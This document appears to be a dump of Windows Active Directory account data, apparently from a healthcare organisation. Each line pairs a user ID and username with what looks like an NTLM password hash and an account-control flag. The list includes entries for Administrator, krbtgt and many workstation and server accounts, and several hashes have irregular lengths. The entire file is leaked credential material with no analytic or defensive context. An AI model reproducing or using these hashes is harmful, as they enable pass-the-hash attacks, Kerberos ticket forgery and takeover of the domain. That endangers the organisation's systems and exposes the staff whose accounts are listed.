1944 abeachy 9eb9ce5359d0d219636287eea5715766 66080
1369 drjibben d2bb7bae3a812554e6560a80bf8c0d7d 512
1783 drwhitley 6df025ce8b176733799affc44a20a202 512
1743 pkelleob 6b0b3bccf6939dabfd45089122d67bc6 512
1916 ahasling 346e634f32780e32afc8e0af7b50b882 512
1512 ftlasala 089baa6e44b9f73e9dc07a440c531c96 512
1177 djmoensu 6cfc0d4e4a46bc30cd9ab35d709058af 512
1931 mjansen c5e7e74db335524b2231d823efbeeef2 512
1949 tdebrito 71b43a8306d1bb60e84a0bc2400a5a21 512
1950 fkarsnia 71b43a8306d1bb60e84a0bc2400a5a21 512
1951 dwinans 71b43a8306d1bb60e84a0bc2400a5a21 512
1958 emedini 9674fbff3cfaaf66f4d997c889a8441a9 66080
1948 jzosel 71b43a8306d1bb60e84a0bc2400a5a21 512
1941 jsmoza 333dacdf4114b5c91dac43802a36fac9 66080
1198 gnthorp d147b5251d854e35c0f453690eb6f92c 512
1960 maakinyemi fab06fb7e4efb6a185c40f5e84eeccbc 66080
1963 mnhasnain f0f75ba30b39a4f952d09c0887e9f08a 66080
1938 bwaite 2f3d525c6bd8e700a68f44ba6460eb4e 512
1947 jstageberg a686c0c3a2580fcd62c1f5c311293ad4 66080
1516 anmorimoto 984b3943b1222418e0b227338c1702e3 512
1662 kkschabi 8fc0da975463b786cb63a655b7c7ba16 512
1517 ctmn00 9e9b58c2ac713d2ff083ae568bf40d6c 66080
1968 dsstclair 55dc4b979fed2985f9180d1ba427c817 66080
1489 parkin e1266a7e4dcf5e7064c76047a561c7e0 512
1368 drbrown a490b356a1f039bc5d02b07a51eb7caa 512
1971 jak c59508253f1ba8a772ea7b39cabcf7dd 66080
1972 jmehlert 777a4677299f8631c379d2ac18ce4830 66080
1974 hjschwartz aa2ec5b61be663b1ba420069b8b7d644 66080
1976 sllang 5821f9c48a246bac75e67390c51d7221 66080
1121 NWKS1$ cdac73fa5c46121e947253723c207d180 4096
1122 NWKS2$ 380dc1a1758e385f05b1757caf83e053 4096
1970 hottenbacher e957cf961db72e8b18461f42b32b8307 512
1120 NWKS0$ 7548ee60d9258efe0b68c20326289b4c 4096
1208 dreisinger 26c5286aad4cc5a67d6c1b498ba66878 512
1339 kaanderson 4b1dd37505ef1dae700f315e3971c75a 512
1298 marylouolson 22958710c569d1fa791f43aba4d4e9ea 512
1977 slmcfarren c42527f7be2aff1c302f881d8174a910 66080
1982 drdussault 71b43a8306d1bb60e84a0bc2400a5a21 512
1526 tmnyarandi 71b43a8306d1bb60e84a0bc2400a5a21 512
1525 grweischedel 4438bcb26b836b0339de5a6f2e66ffd0 66080
1981 oomokhodion 34edf9d3e7c66c79ccbc6225730a81d0 66080
1665 k_jordor f6212a5ae87201fe42f9d891d322cab9 512
1451 mjbutcher fcfcec23f19252d7417693e9819d8a37 512
1528 jjrigby 6ace8f289143d7bb6e5f12aadf93676c 66080
1482 lvogt 8626c1417d2543e499a70055697de1cc 512
1899 bhuotari 91f0894b363984686d7f3f32a681fe07 512
1487 bhydukovich 440921ebded7e97a4b91624abfa12058 512
1531 lavierra 315518d92657659650692e8423d3bdb5 66080
1763 d_debror 4ba24a6ef06cc00b505db9948ff695e4 512
1522 remartin 5a754961d0cd7e31f078484ff86d673b 512
1509 awells a4043550c328b3ba9832e6f755fabd24 66080
1533 dsunstrom ef270a89b56d96ef597a8c29f306b2b9 512
1481 jnistler 602a005eddfd365e04e4db27038f6c25 66048
1537 tdozak 02a7690cbb5ba35f67703ff8ff0251be 66080
1896 fmitzel 0a987196697088eefbbd958fc5bef859 512
1480 ahopkins a54ed711f34b55cded8fb5b64ead0b4d 512
1920 tjlind 73cd1d8f36c225301f1395a68644e91b 66080
1747 mlwicker 75b21858169704679e44b7de9485381e 512
1311 susanwoessner 11e81c29d73b8b739d48574bf0aca075 512
1994 smzak b7cfd41fe075a15963664b2459faa455 66080
1993 jmjohnson 530a7f8e06360c77afb7b16cfeca5584 66080
1992 ahaseeb 221ddc7e89d6ef0a69bbfa241379808a 66080
1991 amguyot 0fffd31fca8b05a4beaab0efc2bdbb42 66080
1990 jmgrudem f477b0398e548a8b526eee322df6c6fd 66080
1989 bjdavis 750c52d81089f4d5d662e82425fa7890 66080
1988 saung 5567e9bf2f46d7951f2a9660c0b48a77 66080
1956 toberg 74dc5c8262a0a22130c6aee81dca267d 512
1463 mebruininga 12050de9174a28b116fd22989bde2b10 512
1969 seharte 73a5ab74fb4af9b2562c7e0ccaf24e04 66080
1962 evavo012 c7105347e9a12d44934ed8f1b86a963c 512
1688 basillerud 85d9373449b9dd9457b3ba5bad1e18b8 512
1995 rpmontenegro 91214c29730b425f9254efdcb2e98894 66080
1996 jmmayland 66b3bfc3e9ccf7bfa5908978985b1a8b 66080
1998 skramsted 54dba8a6ef6f4180785f97a926fdb929 66080
1999 tjmohs 8e1140495086fcd954b5dfa1682d8853 512
1540 drfreeman 38c7a4d796a3bc428467097c66a7824e 512
1490 ncarlson 13d20ae7b8d1edd2a5cc2a4850dec98f 512
1954 relder 23eb25e4307a4c774c553792b29f8b 512
1518 dstclair c405a94abdb3e08736a8250e609691b5 66080
1542 djharms 4646a25232b9877c8b4cede7a79054bd 66080
1411 drellison c3b00a190a99d9f3b4e415d11491a9a2 66048
1543 pswasemiller 69246f6d972a33a4d250819f1c4c4862 66080
1547 ajstasko f3973a2a5b3cc520f11d6d5377c90887 66080
1539 adweichelt 33c88da77d69a77464c22a01fd52cd23 512
1671 k_demmed 31e8cefef1084db5c465273ea21e2b89 512
1498 jlbaldwin 8afae19cb75a9938e93e0d64185cb1c1 66080
1497 jpull 2003a86bc4317ae69c3a94df2e34271b 512
1532 arpicker 1bde10801d22449dcffb76188c626bb6 512
1473 drehler be64f8fc4124dd98cde17a19cb48acce 512
2003 tthuyn 74f754c71bc591379ba8d9e2450ae76c 512
1467 ratinsay 8a6d1d02b5f1ae79d48adc0df621f699 66080
1309 smrodriguez afde914ef03a7f99c1e400d70451a5c2 66048
2005 jrglyn 5d75661d8a53ce0417d1b6749673b16c 66080
1877 kpederson 051e63a2e0111187dfc88bc27a3bebde 512
1272 connielokhorst 431b4387576ef6314152a56f3e9e89c9 512
1736 jlindgren 0b048129c6801a30012c877dfa365985 512
1927 hrabbasi 522dc460c454db1afb366ea21bb28249 66080
1557 brhils 9c8ef96d93ff6e98dafd1dda813f015f 66080
1558 gzike 71b43a8306d1bb60e84a0bc2400a5a21 512
1711 njrundmu 3962a1c5095221bd197b54359b1eea4f 512
1561 snkent 8e4f2b090e863e4a4ab746266f395f97 66080
1562 nikreit 61bf357d002e67b6a4368816b3070056 66080
1788 dreelkema 71b43a8306d1bb60e84a0bc2400a5a21 66048
1563 mvseverson e8b5663e5c7d55253644c62d078a01e9 66080
1194 ejmoir 5add8cc48ec47eb612ed4c225935726b 512
1556 smturner 493e7347661f5df50e12d38cf45a7a11 66080
1566 bbbarnstuble 9077ca9df2f813557f61436eddbd1617 66080
1983 cdlureen 36192c3f8a11b1cc743d45d30c12b039 66080
1303 phokanson 71b43a8306d1bb60e84a0bc2400a5a21 512
1397 ijchitu d53fa7b4a7afa23d6959e9a162f594bd 512
1421 drknutson 71b43a8306d1bb60e84a0bc2400a5a21 512
2014 sbatra 40fc2f1989e9062550bf0aed5c737947 66080
1640 cml 1bc33e42cb19a792844b7fb6dd04fe9d 512
1310 susanschlueter f3e6b2997d0aa15c50e8dd0ee057882 512
1470 charlie44 53da6be61082ec74b099dceeb80cd75c 512
1898 lroehl ed0b817db13e1848e1b4b5881ba27e05 512
1564 seknutson e768dfefaf663c7662405337f32557df 512
2012 mcbressler 15701ec0d0df81b920df1285e038926a 66080
2019 abjolley 72551678e0cb74c8157833428afbfd87 66080
2022 inansine c989196e3f82c855bf256c926344231b 66080
1170 emlodicc e25144ddc66a1e65d6025c687a363c80 512
1570 grhyland f7f2f14d1571ad848b5caae0afe576aa 512
1986 alako 97097d2962cb4b3dd0e0ce12aff3ad 66048
1952 adool 2ddf823d166e7d8769a76a9b9963e980 512
2006 bboom 56ff6b4a94bb106bc53ed861131a084f 66048
1953 pappelget c1287233b1dae2ae1cfb93f65003358d 512
1356 beckyhensch 6e5e3967d92ddbde06e26298c0648194 512
1679 osmotkfp 50c877f12bb3ab3a1ae0c90967f4e97 512
1836 staceyswiontek ddd1940715650b21ad48c5ba67adcc38 512
1987 akuhn fc88bee9b0c17ca524adb09ecc8b805d 66080
1955 awohlenhau a75fae5b4c80180977b062a2b01f1187 512
1534 baagard 0290400c405abaf5a5f6c862ce7ba8ee 512
1124 NWKS4$ 002d632e95effc6793cba7fe5dc65093 4096
1578 kklabo 715b5362db34d6acd654e0a1763483f9 66080
1577 klringdahl bf8e69157a193c800a66b83c8a9df864 66080
1364 NWKS11$ c0ecff2a6454d92cd29619414c879ffc 4096
1362 NWKS9$ 7c148e919425e07f48df098d481d91eb 4096
1123 NWKS3$ 7ebe7393bbd374e6161fcae2129aa660 4096
1130 NWKS10$ f245c27b080ceef5f43f5202aa80e5de 4096
1382 NWKS12$ 366eaea8e999f9b72c7d40ee8819ed2a 4096
1128 NWKS8$ c8d0b8661825257099bbea223526b4a7fa 4096
1156 t2 00e05128adfc76f8abd66588f9a5acf7 512
1111 backup 6817c701afdb1af1fba708761c2fc56d 66048
1154 test3 5af3584b3dc373f54f88c04f9bafc4a3 66082
1133 demo a80fdb8db842a99d87ef3d857f8ddcf1 514
1429 trthormodson 55a87b3f01b7be6d6fdd2e8adfd5f7dd 512
1127 NWKS7$ 25051c3d18bb3cd72a2eac82e43ce515 4096
1126 NWKS6$ 540b1aea40c7862d081dfdd9191dab69 4096
1125 NWKS5$ 02552a5f4bc62a86aef7991040415156 4096
1242 drkim 4a89fabed90f8bdaad4c3b5f9849d0da 66048
1116 NSTORE0$ 2fee332c247d4950ee9a515b30cf1332 4096
3605 dummy d1856f76c1ad69d2f9fd1cb4d184cadb 66080
1285 juliedevries 3286bbe80dd8a5adb29271452d3a25 512
1727 j_herzrc 71b43a8306d1bb60e84a0bc2400a5a21 512
1529 dmarsolek 0d9abd5da9c1866c5bd831210a492743 512
1114 NODE1$ edae82eb008b0370092cf194246b2208 4096
1115 NODE0$ 0b0c7cac3d4a70b8a757bc22671deb8a 4096
1271 cfvorland e8254befc20061f88fa9f42a41e0c8dd 66048
1604 NSERV3$ 1b98c8261bc0b0e672d00be49f42848b 4096
1546 oaajayi 17ff2378c1e12cbfe599b888c1150ff7 66080
1775 machelleellingson e4f089a7c304f1dc1b780153ecd3f364 512
1483 gschwartz 9ce58ad20c46478fce080e997bb33d94 512
2021 nlnordwick ee4ea2f8de1cf636ccb2be6dad783ddc 66080
1544 smitzen e51624612bf604843c28b87c28d92cd1 66080
1305 sarahthormodson a39cda5325b0e788aa11340313ea0345 512
1443 crcolosky edebf24db8fd09f1a0f968a391cef2fc 66080
1812 ptmgr 760914937703f202577c78f561733b31 512
1975 kakragness 56e541a171ba2657f59d037c1eca01a0 66080
1973 loriv 4c3f522e7795bf6057839202b9217aab 66080
1939 sbt ce19b3c08eefb3c70f7ff8d635bca0ee 66080
1816 raisnf ef41696712216e5d6b18f34591f7e3ed 512
1967 drsullivan 28a07a24ca69c3096c371f83ed2fd6bb 514
3611 jmvodvarka 0988517aa5c0d23287f5531bd767bdd3 66080
3612 rdleach 305748acc942ce51ea160ffbda2559ea 66080
2017 jharren 73e28a16319bce0a219a862c9f204430 512
1500 skchristenson 54b9fc57d368b8ff2a7101acbbbe44fa 66080
1131 NSERV2$ d761fd6b7f26488f9698d91b7eaf1e1e 4096
1919 dlsellgren b6a7b4ccc18e78e895fdbc2a347d6798 66080
2015 ionyeka af4f10cee095a721eb8cb3f036df1c70 66048
1738 drwinans 71b43a8306d1bb60e84a0bc2400a5a21 512
1554 jmayer 787289804393737481268248227c117827 66048
1722 trheeter 0b05de3837e6ba3ce07be5fce98c6322 512
3107 almoe a87b3d76707861af97c27a27187819dc 544
1538 daseiple 4e74436540e598306b5b2ba9c16e9620 512
1513 mlwallsu 160a1427d98056bf150dfaf2fe48777a 512
1667 jagreesu e7cb8d48488e91ea0dd4548f574d6659 512
1761 jagreen eeda0eb9b71e405585858da0d7642ab781 512
2046 rmjohnson 289c0c451964e336712485cf8dbe4755 66080
1545 tmsevernak dcf92958c0599f683d18a8701d6efbd9 66080
2037 bellerbusch 1ce00366e6098db49075cab81822db56 66080
2008 fkness 5f43280579e5f5062ffb466c323b79cf 66080
1454 eaberge a25c8562b46b3d0c1533faac1dcde5ef 512
2050 nnwelle ab8daa583f3d0b371e69a77e6f572bce 66080
1459 bmharrington 854433a874acdb34b89038360951ce 512
3613 mmmorrissette ad7735963a7ca199196f8dc3a0cad73d 544
1882 jdmeyer 6c2f21eaeeffc12bac28d943d81901f6 512
1284 joanneness 0c49e463779481ef48b1f1feb997bf1813 512
3608 bhebel 2bdcad6d2082323222a291328ab4883e 544
2053 sselander 729e9ece532d9019bd9038ce881261d4 544
1291 lorikress 189991f5fe87e3a5a7e9e48d02d02ed8 512
1253 jlgaddie 347d96e999a64676c9867077c3def848 512
3111 sevans bccc9db3f8487cf2d7a5841b947e5352 544
1203 drasp 1281fdd45fab83c83c14909815968d7fde3 512
1734 bjneulrc d7a898205589c97a081ecfe4e1d03dac 512
1197 lbdrewsu 95c852590a06992b56dc18c19d8f7ff2 512
3619 amschuler 66c2ea682add1cedad28a54d2abe1e29 66080
1270 cherylbarry a9936d9ada4e566970ffab18ad878360 512
1381 pstoy 4f0a88bd21612aab75bbaa60de5a0ed3 512
1348 annvipond aa6a9b32f4966bd433a43775da85a4ef 512
2025 ajberger 8589f311be9a89f3f5cb9f25b7331786 66080
1264 amysund e81b0a2dd62794e47449df0069578e0a 512
2054 ahovet 71b43a8306d1bb60e84a0bc2400a5a21 544
1749 bramunds 08f433ddf0fc1ca21774d06679edf8bb 512
3609 mmorseorse 92ea6607ee7c2e6d531767525ab897d4 544
1672 mjdethed 39ea5315b341f934298362c6d4a91c66 512
1762 d_buskor 3bc79616b3e5f0ff07e9cb3b1c15c681 512
1535 nreger a9c4f9d0547a927b2a3218803c8d7294 514
2013 speterson318 753e158458814722e2a683c683d5c8e97 66080
3117 snhoeper 0ad907fdfa4b6b97feb2958184664c5c 66080
1751 kageormu d1394916f03c58c542c1bd959d4f887b 512
1879 drhone 47e51872dc078c8816c4444e09cdc47c 514
3120 lamartinez f8661751b21896715d42b388a201e403 66080
2056 klvaughn 270ad290a806a2a58bb980f8fcaf6f72 66080
1555 jturk 07dcecd4742430e0327a34353df4e5fb 512
3113 hmckay 35e649e3253284b7cfdb7797ae18bc73 544
1932 ecokundaye 5cd2316d2043cbbe21c042ccb0062669 512
1560 mvagts f3b3687841a863b9756718138a65e0f9 66048
1559 jtovson f2d2c21e5cc948ad54cdc241cae398ab 512
2011 skhan 3c850a53e8f962d6d2db12ddafe2b38d 66080
3623 habjerke 7e8c84c917c9fc038963a3ce93216e85 66080
3624 nmburrows 53e1a7c692df47380ac6b10fa929d619 66080
3116 lbade a42517c0b074323ed7551e7843e06a6a 66080
3622 rasamaraweera 53598c7cef57dbbe022cd6c3a060dd62 66080
3618 cknapp 8d44d9d97a7eb51453c9675c27f77d58 66080
2057 amueller 1715ffc1cc289374eac3d026d2212729 544
2055 kherness ee1357a73b9570c7417e92a6c42108b2 66080
1865 jsanders 7bbe92186dfa6d83ff80f86ea5432bae 512
1854 drbrett e61249c7e0f735af6455250d047454be 66048
1765 drgallagher 39a6ccd7d6d2babdd11650ca3e4f2e7f 512
3125 sreilly 23ae101070bc0586361647a114e924f4 544
2020 teevenson 21cd92559f2f6777c392238631bfa2da 66080
3626 svaishvav 55d497470255d27142997ea1a14440 66080
3627 cwwieland ae28fff64a4fe592611d190f19102983 66080
3625 lweyer e3e7eee1ed76769a23f471ac120c1e06 544
3124 nakunz 9dbc36a0c8329bd74432d16fc2c6bb6e 66080
3129 kbbitz 97e8e354617e6ee997afc476e63414a8 66080
3127 djepson b678ccaaaf35cbc0abfca452ad58a228 544
3131 bjvermeer 4c62227a61ee486a68c7a9669dde29c0 66080
1921 emseverson 4f44dedf2fde9618daac909e19bf86e0 66080
1349 gpnordahl 2fd4028cbf019e74c73561a8b38842a9 66048
1657 jlhoxibi 0d83157bb7516b53caefc4ddb26cb3a8 512
1837 jattarian c351b623e6b9a8644df6e0306668be3a 66048
1226 drpettit abc9339628f25497f82bff321aef2adf 512
1424 drlazzara 621cbce749b9e2d0d3932c569570af16 66048
1354 mhstrosu f101a562f2474a7ebf2c882996f78dfe 512
1414 mmalterud 252f40027953f53db8d5355fc4e623f3 512
3134 drsmith f53cbf927e94b3299e739c5bd5a68a82 66080
1383 drgundersen 6507e1a9ce1074d7033ace38472930d6 512
1431 rakhan a071fbf41deb4a041253d28e8349e11a 512
1255 mjblank 3a9be57e8803c1d632a52665e8886922 66048
2063 Dmsoderberg 1e27ea1d77323210ba372ef48bc2435b16 66080
1371 lindaanderson 99bc030173d93dd089f0fb00f663a592 512
1936 kdkaste 979cf8e3376ea416e5e9e247441f145b 512
2007 emurunga 68859a1fae623d63c1afb7f4722ef25e 66080
1367 drmcdonald f0e5ca8c0726e882a6d08ee2fecf6010 512
1494 bimanoel 53ced4ca69f53350ac0a242037b42d3c 512
2062 mlmcclure c724392f7594a12f52a3e2ae3f09ed93 66080
2059 sotto 556c52008436c466b802843877ce5b77 544
1895 lwatkins 335c8f6f374ddbb6942e65e09dbfba17 512
1464 stesfamariam c8ba09ade5d018958a24e66aab7eb381 512
3615 sdhansen 3be1b8bc507e147aec8fa1c8c3255ad1 66080
3133 ebibich b418813395857c8dd626946ca72aa6d 544
2060 cschroeder 848c5db736f59224b6521f83de457008 544
1316 njohnson 71b43a8306d1bb60e84a0bc2400a5a21 512
3126 krwannemacher 02ef3299dba8d6b10273d2ec377c451e 66080
2051 lemolter dc9515868900774b69ae6764f74b03d7 66080
3130 mfradet bfec4f416bd9c687473afb442cc89786 544
2066 amusolino 564591a18751d61a058a8e12a9ea2b3b 66080
3140 agqazi 37c1acdf538c07ebbebadb2e013b65e1 66080
1254 jyrkwa c49ad9b094c1e2e9070a48b48b50c40bbca 512
2058 mehouge 21ed21c51ceb7b847881ee01b0f2f0b2 66080
1390 jlnuss d7d4080754aa8e52b97190de07090957 512
3630 hrose 1a7205abe0fafad537d6981673923a5d 544
3128 bgeorge e6cacfc8e3db00201d49bb163118f601 544
3139 cjfisher ede2b6f6f961d6a7a14181af90e0391e 544
2073 blsolheim 5d20da4120415a68bc3ffbe1f00551f4 66080
3632 barettig d6a8135ba862cf03dd064ecb505e1c98 66080
3115 sadahlen d79359164379bec437474a4d9d8944a0 66080
2074 drpauley 112602cfb846fe1795c14c68909dc678 66080
1166 pmpetecc 46e0ad709c50659fc59b550ed7f232f4 512
1365 mdmartineau f8ae494e75ede253bcc67de16fa28e03 514
3142 llcodner 50c1106bc8acb197a255aac5e721709c 66080
1541 qualcoord 0354dbb8b376dd32094b1aefd044d37a 512
3108 ztariq 4705d690f3cec55eaf97c339a69e71ad 544
1173 mjweinri 010f4c58fb04b3ef9b0dd6fbeaa9d33d 512
1682 ljoelkmu 3310515e0a269685d1f2c706cb1a84b8 512
2071 mchris c549a587fc362d601d0a52492a4f9ad3 66080
3148 kljohnson 54f315b20794c3d5f3eb65cef37dd955 66080
3150 kjwalters 0bb84c1adf6c83e25de00741092c319d 66080
3151 nsfroslie 7b759a3f19d6ffe661a629155aec8266 66080
3153 rdcampbell 9ddd27701fca52a3ec319fb2a5c34466 66080
2076 aregan c33f96e046365baab7d0a02204d42cbe 544
1491 slmcgaughey 200a4de5f8bd14c46d65bc8ad1c6ca06 66080
3106 pacs 8846f7eaee8fb117ad06bdd830b7586c 66080
1514 lbdraxten 4d91441f69a87232486af44a6b08f253 512
3633 knelson 03d0143159401abee5a528c0dce74768 544
2080 Cayarke a0316a9f9330960ddad527b32f5af0f4 66080
3638 ljniesche a0abcb477aa06118d0ebe413532cec34 66080
3639 tmwatterson 76aa8428553737150243c4c963d569fd19 66080
3637 jmotto 3a3c6bebeeec017dc900caeb7ccbfecdb 66080
2077 svaishnav 55d497470255d2714299777ea1a14440 66080
1293 madillon 1ff36f57aff1d5db8800d2c785a0cae0 66048
1764 vrdillsu fac2ef7f50e774a2e41df12dbc505099 512
3640 dkgrefe c7ed39affecbc90fd91a1abf68edda0b 66080
1686 tlanderson 55150fc03adda47232d11fa83533d995 512
1984 aleimkuhl cbcd954052a0dcd5384e34f3353a99e1 514
3641 jlheuerman 5281ff4763d8fb598c4266868eb8a7ad 66080
2088 cmmartel 5d1bc7b455964b6f5ae4317b6fb3b9f1 66080
3146 wdduphorn c3b2e61a8a7e9328a07c93457f636b0d 66080
1820 nronnrl 19ad78367f61ade03434329df699aafc 66048
1773 tammimark 9938969a3e61da4b7762cb0b28e52eaa 514
2090 lmmilbeck 51aa35e3c69e3af7a8cad0f55e11d8fb 66080
3159 tjstudor ecdc539913db29572a6db500a015789f 66080
1942 nmnelson e63625ad3dbb41c2de8e7f25b5a18d69 512
3155 mzarbok c8e58daf37662e53ad521414519da823 544
1358 hjanderson ba2f17c9a6927eebe340a25d57fc63a8 66048
2048 aghohman 9649dda66c04c694863b38c02a6e3d3f 66080
3158 kmeichten d20236d18fdb68f0bd26824a1d687fbe 66080
2081 jdavis d9c08ff5332e2c79e582e88637cb260b 544
3642 cgordon 51457260c1e3b9e4b265a9201cdfd713 544
1757 kkstensu 0076dcfb228b7cf51861624948f4a2a5 66048
1925 slmontella 339a9f43281e1d64712917d8b34ab34e 66080
3154 skeller 4857e8c54f2cc52b41f268533403988c 544
2092 sburke a3742094f040007d503a077f3b7b18a1 66080
3636 pbaronhabberstad 5b53a73bf553fcf9374db33be0cc7fa 544
3141 vandvik cc5077e4d91fc974fa62d8629e9fba7a 66080
1799 alnelson 7e003487c37a3874283424b645d18668 512
2079 knstorey 1027f9d7f556dab44d720831e603bcd9 66080
2095 plhed 23e1cf54a3a8db2a8669d4e12a0a8241 66080
2094 dlundby 6b2a35a602186a65973c02150fb70bc9 66080
3161 klillquist e910bee2cd95a3cfabe052189783b1d4 544
1702 wynnkjhs aaa952b4f92018f800e5c19aa9255a6f 512
1706 slleroy 3f7684d51be0a9a78cd7e7a36c7e297a 512
1666 j_beyesu b5ef8bc4d492c5e96fd3ac3d538502bf 512
2083 kbressler 6177b8ccd78e74cd0e23f2121a0f95ca 66080
3156 rbeech b2c06077f1866a3ff2f0e30120d194a9 66080
3648 krubink fdf417ac259ab089e4fdb06269ff93ce 544
1277 djmoe d8a0a68924b7b8dad11e0940ee72a147 66048
1980 NWKS14$ ff080dfeb5a55503cd8129caeac080e4 4096
1521 NWKS13$ 8114caf690393938e8beead4db4c7bab96 4096
1420 aedraeger f23c5c919a07dd7cb86a9d9dab192ef9 512
3164 lmkeller b7ed01f474587ed397b553a566e0239b 66080
3165 drtest 787e222e7b428a71b895c3d39f1ca222 66080
3651 eripley 71b43a8306d1bb60e84a0bc2400a5a21 66080
3652 hsolo 71b43a8306d1bb60e840bc2400a5a21 66080
3653 jsparrow 71b43a8306d1bb60e840bc2400a5a21 66080
3654 erdoctor 7c53cfa5ea7d0f9b3b968aa0fb51a3f5 66080
2000 acbabb 64eaf056b0f7c0f0fc6951ce71e6d6c9 66080
1828 sjpeterson 16497f15560fd9fa371c158b47241b66 512
2068 rluong a82f44c197d723aaca24812e8c6625c1 544
2101 testpacs d44c1eeef473921cc43b079f4a3c1412 544
3168 sclaus 64eaf056b0f7c0f0fc6951ce71e6d6c9 66080
3169 bbee 7c53cfa5ea7d0f9b3b968aa0fb51a3f5 66080
1109 aliedit a80fdb8db842a99d87ef3d857f8ddcf1 66048
1159 iccumgr 544e16f0bedca7fe5b2edb739a0f3111 512
1505 erdoctor1 b14459797d622853569db78c33b43474 512
1241 drtdlarson 5202215389406b0eccb2f1f029c57e9c 514
3166 athelen 2df4f3ee1b4faea233b68268ae983329 544
1574 VMUPGRADE$ 86bc8ae462a55843fe67520b11523d58 4096
1553 brhills 53c6e7c8b0150f36b797ad32d62abc28 66080
1661 reinasor ccf69751cc4a4f8e318b0df52947ccc4 512
3656 mbravo a9bcd52c5198a83a66fe224315fc73f 544
3163 aabliese c4fd4d6e475ab961362ce4ee231aca2b 66080
3109 kjstenger 8ec37706d3de0518b3220192dfc58061 66080
1805 jegervpt 701a630ff55b9ca5c8639cfa39020564 512
1324 lindasander e2a2964ed651c0f7ba4ec81dd01e02aa 66048
3650 khowell cf561634a85d8f5597446005fe7fd8d1 66080
1158 m_rittcc 18bf1995a1d949b7ef9741892266efc5 66048
1118 WSERV0$ 9da2e9383bf4520440d92ac54ac8a4d58 4096
1745 lljennbi f6d4b79198861b1be247d463634341c6 512
2042 pjzimmerman 84ce0bce7008f217cd687f3e5126eeeeee 66080
3614 badahlen 75222701b0d398c68117ca403f205478 66080
1174 aanelssu bad82b030b9c4842f80656a128a76b67 512
1758 hmneulsu 78e277034ec4906d2525b079d4c5749e 512
3174 danderso d4e7dcc95e80467c613daa02cd83b446 66080
3664 ewestergard ba4aa5e94885b31904af6af6c1bf4f39b11 544
3173 csylvester 55b7d520ed567ed59988a54f20078de6 66080
1943 lmweiss 706ee8e0530f19256d86b5457ffa93d9 512
3172 nlstrand c4300f168b4a6ba2c638ce330c4b4a0d 66080
1282 jillgeary 2f913a2a114e727390a6aedc67024b8b 512
502 krbtgt 0743a7d1387b8223ea5683c913ff9e33 514
3661 bgesell d18a344ee8d2bd0a7cf2c10b17a1ee02 66080
1889 hmasmus 62dbe4c921ea6d6f5f412b982405a944 66082
1317 kverjlsn ab6bf500d58072acd7d09530dce4f6b 512
1922 degrunewald 5d773ea1aa7e3d4e47fc15750e8084ad 66080
3658 rloepp c88b55448a90898be0d8eaca3e7c9961 544
3666 ceaves 3ea18c0fbd5c65cdc2b3cb180f99aa0d 66080
3177 jlwilcox 633d364df0e81ee7ce9de549fc9b0088 66080
3628 MRNWKS14$ 3e00e4aae6f1cf0133f66a3b70959413 4096
3178 dmbartels 3cd77333d81bd637234a19ac76ad399b 66080
3181 nraman 366b8b4a49c10e7441fc1b241868a2f2 66080
3635 bdelage 2699a0a42951c71f032da1b9e2bfbf05 544
500 Administrator a80fdb8db842a99d87ef3d857f8ddcf1 66048
1523 tbmatheson 1f776ee6e96b208f8925b03cf11994e8 66080
3660 cfricano 6bbcb20afde0d6b67e6761bb9a7e280 66080
1926 drbarker f990ee0e10ca11e126d7e7001181c0dd 66048
1477 levranz 08a4a2727a1ca671c9260c85d6debc46 66050
3674 jhansen da59c62be282a2b3a207d663eaba129d 544
3676 bsundar df4e2753ded8ea9d3982d6b386196c95 66080
3186 slmcdonough 19019865c9627db050d3debc6d068d59 66080
3187 sbkriegler 51a6eff0344e71a73ba0465acba0dc02 66080
1219 drmagnuson 2b89a35ea806d441361b86e8928f0069 66050
1884 drdellison 7b3ed86168a343943a860db9fd43326 514
1617 radmgr c6ff3f57b90e71395cc63de7b5b80086 514
3104 kkkemper bfe2bdf62b5d348db2317060791183ad 66082
1625 dennjxr f5c1703c283b2e86061e499e9add725c 514
1867 kbitzan c9ea8a405ddbf37e55ef0fa1fc5e7062 514
1635 kjjohnxr 50a17b4631d880ab69c0bff939184e1e 514
1643 llsander 71b43a8306d1bb60e84a0bc2400a5a21 514
1396 amvoorhees 71b43a8306d1bb60e84a0bc2400a5a21 514
1447 llmarfell 382caba988ddcb6b0e7d433b44168b60 514
3110 abthompson 752c4e688d32292b2369a20766f97fe9 66082
2049 tjpeters 661245aab3a2da1cffb9296f4c1bb2d1 66082
1648 thomrmxr 22daffebc9951232db7c2255367541f4 514
1243 bmc 51e4a88e2b207731dfde221c1aac6433 66050
1232 drvan 6198afcefcf76d5aa8ed5a0231f7c4c6 66050
1235 krw f53551d10c915a704f27bd094983b4a1 514
1399 rapearce f5fca4da57abb3624aec5ca9711fad2e 514
1869 drpinke 928084d464e8e2b46953a287d34603ce 514
1901 vkapoor f08ad0acd589ac2d8077cc6be3823b55 66082
3655 drtillotson a14701c2fc0c888805c49abedeab76c7 546
1259 cardiology 0909df2be620d82633dbe6df2a14e822 514
1484 drriley efd9ec287d222a56e5c58fbb5e0c00b3 66082
1511 jkkaspari b68960c19bebf90e2519ff493224cb5d 514
1510 dmspierer 4a842475a181664261effe96a0294ffb 66082
3683 lrhtest c0c14d4369392a6c8984e135341a3e35 66048
1340 akdrouillard b999e773055362a90e066168697f34b1 512
3157 emrabie 84ffe7a05489be6b159d1be4f28d8654 66080
3188 testrad01 7a21990fcd3d759941e45c490f143d5f 66080
3136 arwilliams 1c8a15dc2cf39ad724ecffa34c51df22 66080
3189 kccoleman c53f411c5c25205eb6e41cf532f15f3 66080
3192 kmmuckenhirn 08e79d731566b3e02ee6567b67e06bc2 66080
3193 tlheckman b4fef99bb054df27f3155fb289ddbb09 66080
3185 lglidden 1c74a011d13341346553b4cab99c5f4f 66080
3688 tcarpenter 6dfbc391f973e9edae3d284e217ca305 66080
1162 jdfransen ac3b03f29ce9321c5dc6505ecb69de3c 66048
2085 mdborowski 9d5c0d7a29ba9ab4e8f5ea70731742 66080
3690 jtreynolds 740500dd0c0a4113cb30053c083016d0 66080
1322 jmbernsn 82f1948a684b1ca3acf28319c5a8d011 512
3679 kglasgow 990c521adaaa5e4addf2c9a76018315c 544
3691 mhudalla 753e11fb4f4c64d36d3ec29df1c14b33 544
1829 alerickson 6bd1928a5bff3e98e4e5883d182ecfa4 512
3198 sbeving 395aad84da74aa6f8e56c3461b797315 66080
3200 kpeterson b4d06b8670a68c90ad1b704bbd3fa4a6 66080
3203 naolson e9beec3ca6b473c4e656c1ef9c62a18c 66080
3204 jschmidgall 2e00b6ec17a25e579e9d78463d556549 66080
